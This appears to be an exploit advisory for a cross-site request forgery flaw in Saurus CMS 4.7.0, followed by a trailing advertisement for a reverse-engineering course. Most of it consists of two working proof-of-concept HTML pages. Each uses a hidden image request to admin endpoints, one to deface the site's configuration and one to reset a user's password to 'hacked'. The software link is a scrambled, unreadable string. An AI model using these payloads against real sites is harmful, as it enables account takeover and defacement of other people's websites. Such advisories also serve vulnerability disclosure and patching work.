# Author: Fady Mohammed Osman (cute hacker)  

# Software Link: 210K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4S2N6i4u0#2M7#2)9J5k6h3W2F1k6X3!0Q4x3V1k6V1L8%4N6F1L8r3!0S2k6q4)9J5c8W2y4S2N6i4u0#2M7@1y4y4f1#2)9J5k6o6c8Q4x3X3f1%4i4K6u0W2x3q4)9J5k6i4c8Y4P5W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

# Version: 4.7.0  

# Tested on: Ubuntu 10.04  

# CVE : [Not available]  

# This vulnerability allows a malicious hacker to change password of a user  

and also it allows changing the website information.  

   

PoC 1:  

   

<html>  

<head><title>Saurus CSRF : Change site information</title></head>  

<body>  

<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">  

</body>  

</html>  

   

PoC 2:  

   

<html>  

<head><title>Saurus CSRF : Change user's password</title></head>  

<body>  

<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">  

</body>  

</html>

[培训]科锐逆向工程师培训第53期2025年7月8日开班！